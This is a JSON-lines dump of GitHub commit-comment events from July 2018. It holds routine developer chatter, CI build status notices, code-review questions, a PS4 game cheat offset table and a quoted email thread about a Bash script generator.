{"id":"7968628765","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715569,"position":null,"line":null,"path":null,"commit_id":"9a80b12ed809b03a88d76fe3183cc2e2f44c482d","created_at":"2018-07-16T04:42:52Z","updated_at":"2018-07-16T04:42:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:42:52Z"}
{"id":"7968629628","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29715570,"position":5,"line":12,"path":"config/Migrations/20180712133319_Initial.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T04:43:18Z","updated_at":"2018-07-16T04:43:18Z","author_association":"NONE","body":"Also why did you renamed an existing table/migration instead of creating an altogether new migration?"}},"created_at":"2018-07-16T04:43:18Z"}
{"id":"7968629727","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715571,"position":null,"line":null,"path":null,"commit_id":"b581ecf57ec5ce51fc3581c12bf8a8a4eb8ce475","created_at":"2018-07-16T04:43:22Z","updated_at":"2018-07-16T04:43:22Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 521](https://ci.hashicorp.engineering/viewLog.html?buildId=104066&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T04:43:22Z"}
{"id":"7968629761","type":"CommitCommentEvent","actor":{"login":"jcharlesb"},"repo":{"name":"jcharlesb/S02-E01-challenge-theatre-ou-cine-master"},"payload":{"comment":{"id":29715572,"position":78,"line":78,"path":"js/app.js","commit_id":"1f568d24e5d71f86a878b569ad3c5a9ba60fb4e9","created_at":"2018-07-16T04:43:23Z","updated_at":"2018-07-16T04:43:23Z","author_association":"OWNER","body":"merci c'est encourageant."}},"created_at":"2018-07-16T04:43:23Z"}
{"id":"7968629843","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715573,"position":null,"line":null,"path":null,"commit_id":"be6709a85fc12825c0f453b7036687a4fa67ffe3","created_at":"2018-07-16T04:43:26Z","updated_at":"2018-07-16T04:43:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:43:26Z"}
{"id":"7968630225","type":"CommitCommentEvent","actor":{"login":"ehei"},"repo":{"name":"cyber-dojo-languages/java-junit"},"payload":{"comment":{"id":29715574,"position":null,"line":null,"path":null,"commit_id":"8ee4de5e14a31e2ede9c40373977802417aeb818","created_at":"2018-07-16T04:43:38Z","updated_at":"2018-07-16T04:43:38Z","author_association":"NONE","body":"Awesome! Congo rats on the new house! :)"}},"created_at":"2018-07-16T04:43:38Z"}
{"id":"7968630256","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715575,"position":null,"line":null,"path":null,"commit_id":"5894eb9ab704d802b980131fbc43fa5b70f6db9c","created_at":"2018-07-16T04:43:39Z","updated_at":"2018-07-16T04:43:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:43:39Z"}
{"id":"7968630417","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715576,"position":null,"line":null,"path":null,"commit_id":"b581ecf57ec5ce51fc3581c12bf8a8a4eb8ce475","created_at":"2018-07-16T04:43:44Z","updated_at":"2018-07-16T04:43:44Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 521](https://ci.hashicorp.engineering/viewLog.html?buildId=104066&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-16T04:43:44Z"}
{"id":"7968630620","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715577,"position":null,"line":null,"path":null,"commit_id":"f4e8fdacca4de1a0781dc91614ddac198d1482e0","created_at":"2018-07-16T04:43:51Z","updated_at":"2018-07-16T04:43:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:43:51Z"}
{"id":"7968631533","type":"CommitCommentEvent","actor":{"login":"howdoicode5058"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29715582,"position":null,"line":null,"path":null,"commit_id":"82f4f4a104c3b799f809fb70962f1c18fc5761ab","created_at":"2018-07-16T04:44:21Z","updated_at":"2018-07-16T04:44:21Z","author_association":"NONE","body":"how does one get that much typos while coding? :^)"}},"created_at":"2018-07-16T04:44:21Z"}
{"id":"7968631902","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29715584,"position":99,"line":99,"path":"src/Controller/FormDetailsController.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T04:44:34Z","updated_at":"2018-07-16T04:44:34Z","author_association":"NONE","body":"Can you tell me why only `post` and `delete` methods are allowed here? Why not `GET`?"}},"created_at":"2018-07-16T04:44:34Z"}
{"id":"7968632448","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715587,"position":null,"line":null,"path":null,"commit_id":"934e97e6e19fda104c38643ce48eb4e2a430bb53","created_at":"2018-07-16T04:44:51Z","updated_at":"2018-07-16T04:44:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:44:51Z"}
{"id":"7968632704","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715588,"position":null,"line":null,"path":null,"commit_id":"5894eb9ab704d802b980131fbc43fa5b70f6db9c","created_at":"2018-07-16T04:44:59Z","updated_at":"2018-07-16T04:44:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:44:59Z"}
{"id":"7968632978","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715590,"position":null,"line":null,"path":null,"commit_id":"4668c5030867c5308892c8147a4d47eae796a85e","created_at":"2018-07-16T04:45:08Z","updated_at":"2018-07-16T04:45:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:45:08Z"}
{"id":"7968633190","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715591,"position":null,"line":null,"path":null,"commit_id":"f4e8fdacca4de1a0781dc91614ddac198d1482e0","created_at":"2018-07-16T04:45:13Z","updated_at":"2018-07-16T04:45:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:45:13Z"}
{"id":"7968633383","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715594,"position":null,"line":null,"path":null,"commit_id":"be6709a85fc12825c0f453b7036687a4fa67ffe3","created_at":"2018-07-16T04:45:19Z","updated_at":"2018-07-16T04:45:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:45:19Z"}
{"id":"7968633520","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715595,"position":null,"line":null,"path":null,"commit_id":"9a80b12ed809b03a88d76fe3183cc2e2f44c482d","created_at":"2018-07-16T04:45:24Z","updated_at":"2018-07-16T04:45:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T04:45:24Z"}
{"id":"7968635835","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29715601,"position":32,"line":32,"path":"src/Template/FormDetails/index.ctp","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T04:46:36Z","updated_at":"2018-07-16T04:46:36Z","author_association":"NONE","body":"What does `h()` function do?"}},"created_at":"2018-07-16T04:46:36Z"}
{"id":"7968636706","type":"CommitCommentEvent","actor":{"login":"sunchao"},"repo":{"name":"sunchao/parquet-rs"},"payload":{"comment":{"id":29715604,"position":513,"line":513,"path":"src/file/statistics.rs","commit_id":"132e2e27dc8abf77368d01c944d8668c4254040f","created_at":"2018-07-16T04:47:04Z","updated_at":"2018-07-16T04:47:04Z","author_association":"OWNER","body":"Do you think we can add `min()` and `max()` methods for `Statistics`? The methods already exist in `TypedStatistics`."}},"created_at":"2018-07-16T04:47:04Z"}
{"id":"7968637590","type":"CommitCommentEvent","actor":{"login":"sunchao"},"repo":{"name":"sunchao/parquet-rs"},"payload":{"comment":{"id":29715605,"position":498,"line":498,"path":"src/file/statistics.rs","commit_id":"132e2e27dc8abf77368d01c944d8668c4254040f","created_at":"2018-07-16T04:47:35Z","updated_at":"2018-07-16T04:47:35Z","author_association":"OWNER","body":"Can we add a method `type()` that returns the type for the statistics?"}},"created_at":"2018-07-16T04:47:35Z"}
{"id":"7968637787","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29715606,"position":null,"line":null,"path":null,"commit_id":"5803fd3c2689ed2ac22fdbd53622b81d967d969c","created_at":"2018-07-16T04:47:42Z","updated_at":"2018-07-16T04:47:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-118](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-118-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-16T04:47:42Z"}
{"id":"7968638704","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29715609,"position":1,"line":1,"path":"tests/Fixture/FormDetailsFixture.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T04:48:15Z","updated_at":"2018-07-16T04:48:15Z","author_association":"NONE","body":"What is a fixture?"}},"created_at":"2018-07-16T04:48:15Z"}
{"id":"7968643187","type":"CommitCommentEvent","actor":{"login":"AbelmoschusEsculentus"},"repo":{"name":"huggle/huggle3-qt-lx"},"payload":{"comment":{"id":29715620,"position":null,"line":null,"path":null,"commit_id":"640af8f212cb8410431d39642303d98b8776d555","created_at":"2018-07-16T04:50:54Z","updated_at":"2018-07-16T04:50:54Z","author_association":"CONTRIBUTOR","body":"This still didn’t fix the minor edit"}},"created_at":"2018-07-16T04:50:54Z"}
{"id":"7968644023","type":"CommitCommentEvent","actor":{"login":"gtkChop"},"repo":{"name":"keyenram92/Kaggle"},"payload":{"comment":{"id":29715623,"position":null,"line":null,"path":null,"commit_id":"ba8dd0f7a1e834cbdb4970145bdd18fd88ffcc88","created_at":"2018-07-16T04:51:21Z","updated_at":"2018-07-16T04:51:21Z","author_association":"COLLABORATOR","body":"z"}},"created_at":"2018-07-16T04:51:21Z"}
{"id":"7968644974","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29715626,"position":null,"line":null,"path":null,"commit_id":"34bfffd919151737eabcdf68535cef61d47d0450","created_at":"2018-07-16T04:51:55Z","updated_at":"2018-07-16T04:51:55Z","author_association":"OWNER","body":"Fuck man, i'm fucking sorry that i fucking swear so much."}},"created_at":"2018-07-16T04:51:55Z"}
{"id":"7968646648","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715628,"position":null,"line":null,"path":null,"commit_id":"f29fd0c8a90864121d946e953b48450af4d0ff13","created_at":"2018-07-16T04:52:52Z","updated_at":"2018-07-16T04:52:52Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 522](https://ci.hashicorp.engineering/viewLog.html?buildId=104067&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T04:52:52Z"}
{"id":"7968647366","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715630,"position":null,"line":null,"path":null,"commit_id":"f29fd0c8a90864121d946e953b48450af4d0ff13","created_at":"2018-07-16T04:53:16Z","updated_at":"2018-07-16T04:53:16Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 522](https://ci.hashicorp.engineering/viewLog.html?buildId=104067&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:24"}},"created_at":"2018-07-16T04:53:16Z"}
{"id":"7968651746","type":"CommitCommentEvent","actor":{"login":"kauksy"},"repo":{"name":"kauksy/Programmers"},"payload":{"comment":{"id":29715633,"position":40,"line":40,"path":"src/quiz/TiTest.java","commit_id":"9a4d2584316d84ec459adc9d09105d9234bb3cde","created_at":"2018-07-16T04:55:51Z","updated_at":"2018-07-16T04:55:51Z","author_association":"OWNER","body":"반복문으로 계속 나눠야 함(그래야 자릿수를 알 수 있음)"}},"created_at":"2018-07-16T04:55:51Z"}
{"id":"7968653040","type":"CommitCommentEvent","actor":{"login":"robbieaverill"},"repo":{"name":"silverstripe/silverstripe-elemental-bannerblock"},"payload":{"comment":{"id":29715636,"position":null,"line":null,"path":null,"commit_id":"48bf83f478d2a77c73a5267626588e301709e6c8","created_at":"2018-07-16T04:56:32Z","updated_at":"2018-07-16T04:56:32Z","author_association":"MEMBER","body":"This is semantically the same constraint AFAIK"}},"created_at":"2018-07-16T04:56:32Z"}
{"id":"7968655508","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715639,"position":null,"line":null,"path":null,"commit_id":"f29fd0c8a90864121d946e953b48450af4d0ff13","created_at":"2018-07-16T04:58:02Z","updated_at":"2018-07-16T04:58:02Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 523](https://ci.hashicorp.engineering/viewLog.html?buildId=104069&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T04:58:02Z"}
{"id":"7968656160","type":"CommitCommentEvent","actor":{"login":"wilr"},"repo":{"name":"silverstripe/silverstripe-elemental-bannerblock"},"payload":{"comment":{"id":29715640,"position":null,"line":null,"path":null,"commit_id":"48bf83f478d2a77c73a5267626588e301709e6c8","created_at":"2018-07-16T04:58:22Z","updated_at":"2018-07-16T04:58:22Z","author_association":"MEMBER","body":"Nah ^1.0 doesn't include 1.x-dev which has the 4.2 fixes on the other branch. Best to align the two.\r\n\r\n![screen shot 2018-07-16 at 4 57 29 pm](https://user-images.githubusercontent.com/101629/42743590-6bc389ba-8919-11e8-963e-9a633602e8a6.png)\r\n"}},"created_at":"2018-07-16T04:58:22Z"}
{"id":"7968656302","type":"CommitCommentEvent","actor":{"login":"yefq"},"repo":{"name":"wurstscript/WurstStdlib2"},"payload":{"comment":{"id":29715641,"position":16,"line":10,"path":"wurst/_handles/primitives/Boolean.wurst","commit_id":"b7b08790f47a56dcf8e34ef1e105f5aa3c8a2c96","created_at":"2018-07-16T04:58:28Z","updated_at":"2018-07-16T04:58:28Z","author_association":"NONE","body":"why not like this :\r\n`return this == \"1\" or this == \"true\"`"}},"created_at":"2018-07-16T04:58:28Z"}
{"id":"7968656488","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715642,"position":null,"line":null,"path":null,"commit_id":"f29fd0c8a90864121d946e953b48450af4d0ff13","created_at":"2018-07-16T04:58:34Z","updated_at":"2018-07-16T04:58:34Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 523](https://ci.hashicorp.engineering/viewLog.html?buildId=104069&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:32"}},"created_at":"2018-07-16T04:58:34Z"}
{"id":"7968656965","type":"CommitCommentEvent","actor":{"login":"dtbleach"},"repo":{"name":"dtbleach/Differ"},"payload":{"comment":{"id":29715643,"position":17,"line":291,"path":"Differ1.cs","commit_id":"e3ba8154dcee8537c1d475f15de725f1bd811406","created_at":"2018-07-16T04:58:49Z","updated_at":"2018-07-16T04:58:49Z","author_association":"OWNER","body":"1111"}},"created_at":"2018-07-16T04:58:49Z"}
{"id":"7968657329","type":"CommitCommentEvent","actor":{"login":"lanyazhizhou"},"repo":{"name":"lanyazhizhou/-"},"payload":{"comment":{"id":29715644,"position":null,"line":null,"path":null,"commit_id":"f4688d85ec99e2a04bcd86b407e6f4b8495a5748","created_at":"2018-07-16T04:59:01Z","updated_at":"2018-07-16T04:59:01Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-16T04:59:01Z"}
{"id":"7968660474","type":"CommitCommentEvent","actor":{"login":"kykdev"},"repo":{"name":"esa-n/android_kernel_lge_hammerhead"},"payload":{"comment":{"id":29715656,"position":null,"line":null,"path":null,"commit_id":"c009c09f2f8413b68fd9a54c547ffb497ab75d6a","created_at":"2018-07-16T05:00:43Z","updated_at":"2018-07-16T05:00:43Z","author_association":"NONE","body":"Ah i see ;)"}},"created_at":"2018-07-16T05:00:43Z"}
{"id":"7968661132","type":"CommitCommentEvent","actor":{"login":"robbieaverill"},"repo":{"name":"silverstripe/silverstripe-elemental-bannerblock"},"payload":{"comment":{"id":29715657,"position":null,"line":null,"path":null,"commit_id":"48bf83f478d2a77c73a5267626588e301709e6c8","created_at":"2018-07-16T05:01:05Z","updated_at":"2018-07-16T05:01:05Z","author_association":"MEMBER","body":"Ah I see, cool!"}},"created_at":"2018-07-16T05:01:05Z"}
{"id":"7968663190","type":"CommitCommentEvent","actor":{"login":"lgkern"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29715659,"position":null,"line":null,"path":null,"commit_id":"e55bce090eebdf88a90be04e78d536ece9d127a0","created_at":"2018-07-16T05:02:11Z","updated_at":"2018-07-16T05:02:11Z","author_association":"CONTRIBUTOR","body":"I just now saw this! About the p.talents change I don't recall correctly the issue or if it was just a fail safe, probably the latter. The main issue is that with spell_direct_power_coefficient override instead of the fix in the right commit it was just dealing 0 damage."}},"created_at":"2018-07-16T05:02:11Z"}
{"id":"7968664909","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715661,"position":null,"line":null,"path":null,"commit_id":"fa9084131a15509f03278aab6123c6e109bab51e","created_at":"2018-07-16T05:03:13Z","updated_at":"2018-07-16T05:03:13Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 524](https://ci.hashicorp.engineering/viewLog.html?buildId=104071&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T05:03:13Z"}
{"id":"7968665406","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715665,"position":null,"line":null,"path":null,"commit_id":"fa9084131a15509f03278aab6123c6e109bab51e","created_at":"2018-07-16T05:03:31Z","updated_at":"2018-07-16T05:03:31Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 524](https://ci.hashicorp.engineering/viewLog.html?buildId=104071&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:18"}},"created_at":"2018-07-16T05:03:31Z"}
{"id":"7968665409","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715666,"position":null,"line":null,"path":null,"commit_id":"fa9084131a15509f03278aab6123c6e109bab51e","created_at":"2018-07-16T05:03:31Z","updated_at":"2018-07-16T05:03:31Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 525](https://ci.hashicorp.engineering/viewLog.html?buildId=104072&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T05:03:31Z"}
{"id":"7968665841","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715667,"position":null,"line":null,"path":null,"commit_id":"fa9084131a15509f03278aab6123c6e109bab51e","created_at":"2018-07-16T05:03:46Z","updated_at":"2018-07-16T05:03:46Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 525](https://ci.hashicorp.engineering/viewLog.html?buildId=104072&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:15"}},"created_at":"2018-07-16T05:03:46Z"}
{"id":"7968685379","type":"CommitCommentEvent","actor":{"login":"custa"},"repo":{"name":"rootsongjc/kubernetes-handbook"},"payload":{"comment":{"id":29715697,"position":1,"line":1,"path":"manifests/prometheus/prometheus-datasource.json","commit_id":"198ce94364b3115e43799fd6795b2563c81f66bd","created_at":"2018-07-16T05:14:19Z","updated_at":"2018-07-16T05:14:19Z","author_association":"NONE","body":"文件不完整 "}},"created_at":"2018-07-16T05:14:19Z"}
{"id":"7968688764","type":"CommitCommentEvent","actor":{"login":"braian12com"},"repo":{"name":"JDsnyke/PS4-Cheat-List"},"payload":{"comment":{"id":29715704,"position":27,"line":219,"path":"README.md","commit_id":"273128bd09abaef5068e279680fed3bea7f8b1c1","created_at":"2018-07-16T05:16:06Z","updated_at":"2018-07-16T05:16:06Z","author_association":"NONE","body":" 1.4|eboot.bin| NIOH  ID:CUSA07123|VER:01.10|FM:505\r\ndata|3|13EEA8|4 bytes|99|1|talisman momentaneo|1876EA8\r\ndata|3|140228|4 bytes|99|1|aguja antiparalizante|1878228\r\ndata|3|1403C8|4 bytes|5|1|municion cañon normal|18783C8\r\ndata|3|29E088|4 bytes|99|1|libro de la reencarnacion|19D6088\r\ndata|3|13D988|4 bytes|99|1|piedra de afilar|1875988\r\ndata|3|15D4D0|4 bytes|99|1|madera buena|18954D0\r\ndata|3|29BCBC|4 bytes|99|1|nivel de mecenazgo|19D3CBC\r\ndata|3|13D7E8|4 bytes|99|1|cuenco agua yokai|18757E8\r\ndata|3|13CE28|4 bytes|99|1|horoku-dama|1874E28\r\ndata|3|13F1E8|4 bytes|99|1|vela de invocador|18771E8\r\ndata|3|140BE8|4 bytes|99|1|mascara de hyottoko|1878BE8\r\ndata|3|1414D8|4 bytes|99|1|amuleto de tierra|18794D8\r\ndata|3|13BAA8|4 bytes|99|1|mechon joven samurai|1873AA8\r\ndata|3|140568|4 bytes|99|1|mechon de joven ninja|1878568\r\ndata|3|139618|4 bytes|99|1|agua sagrada|1871618\r\ndata|3|1E7298|4 bytes|9999|1|puntos de samurai|191F298\r\ndata|3|138CC0|4 bytes|1000001630|0|dinero|1870CC0\r\ndata|3|138CB8|4 bytes|1000011844|0|armita|1870CB8\r\ndata|3|139208|4 bytes|99|1|elixir|1871208\r\ndata|3|1392D8|4 bytes|99|1|roca|18712D8\r\ndata|3|139C98|4 bytes|39|1|flecha normal|1871C98\r\ndata|3|13B5C8|4 bytes|99|1|Kayaku-Dama|18735C8\r\ndata|3|139A28|4 bytes|99|1|Piedra espiritual pequeña|1871A28\r\ndata|3|139958|4 bytes|99|1|Talisman de señal|1871958\r\ndata|3|13B288|4 bytes|99|1|Piedra espiritual|1873288\r\ndata|3|13B768|4 bytes|99|1|amuleto de fuego|1873768\r\ndata|3|13B838|4 bytes|99|1|flecha hamaya|1873838\r\ndata|3|328ADC|4 bytes|799988|1|honor|1A60ADC\r\ndata|3|13CD58|4 bytes|99|1|amuleto viaje seguro|1874D58\r\ndata|3|13C058|4 bytes|99|1|antidoto|1874058\r\n"}},"created_at":"2018-07-16T05:16:06Z"}
{"id":"7968690614","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29715708,"position":null,"line":null,"path":null,"commit_id":"b8168d0c4bb0c47b0e1d46d3aa174b5e37ee9f8e","created_at":"2018-07-16T05:17:01Z","updated_at":"2018-07-16T05:17:01Z","author_association":"NONE","body":"Yes. Python is not as ubiquitous as Bash. I wouldn't mind having Python's\nif statements and path check syntax in Bash for the sake of readability.\nWe've tried to write scripts in IPython, but it still misses some features\nlike return code https://github.com/ipython/ipython/issues/11194\n\nOn 16 July 2018 at 12:27, Jess Frazelle <notifications@github.com> wrote:\n\n> its not meant to be cloned there is too much nuance and id rather do it in\n> bash than have to download python just to generate some files\n>\n> On Mon, Jul 16, 2018 at 12:21 AM Anatoli Babenia <notifications@github.com\n> >\n> wrote:\n>\n> > Looks like personalized cookiecutter\n> > <https://github.com/audreyr/cookiecutter>. Can not clone it.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/genuinetools/reg/commit/\n> b8168d0c4bb0c47b0e1d46d3aa174b5e37ee9f8e#commitcomment-29715507>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ABYNbDl_L-\n> n0ywPZSDs9CTAGSkgUTUZVks5uHBTegaJpZM4VQf7p>\n> > .\n> >\n>\n>\n> --\n>\n>\n> Jessie Frazelle\n> 4096R / D4C4 DD60 0D66 F65A 8EFC 511E 18F3 685C 0022 BFF3\n> pgp.mit.edu <http://pgp.mit.edu/pks/lookup?op=get&search=\n> 0x18F3685C0022BFF3>\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/genuinetools/reg/commit/b8168d0c4bb0c47b0e1d46d3aa174b5e37ee9f8e#commitcomment-29715530>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIX9M6zthcMPzBe77R1bkqsMUrVzPjnNks5uHBZDgaJpZM4VQf7p>\n> .\n>\n\n\n\n-- \nAnatoli Babenia\n\n+1 (650) 605-3365\n+375 (29) 320-4241\n"}},"created_at":"2018-07-16T05:17:01Z"}
{"id":"7968695689","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29715721,"position":40,"line":40,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-16T05:19:39Z","updated_at":"2018-07-16T05:19:39Z","author_association":"OWNER","body":"Fixed, thanks!"}},"created_at":"2018-07-16T05:19:39Z"}
{"id":"7968701316","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29715729,"position":null,"line":null,"path":null,"commit_id":"2418e0098e87afff040e902ca568f065f4628929","created_at":"2018-07-16T05:22:36Z","updated_at":"2018-07-16T05:22:36Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-240](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-240).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-240-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-16T05:22:36Z"}
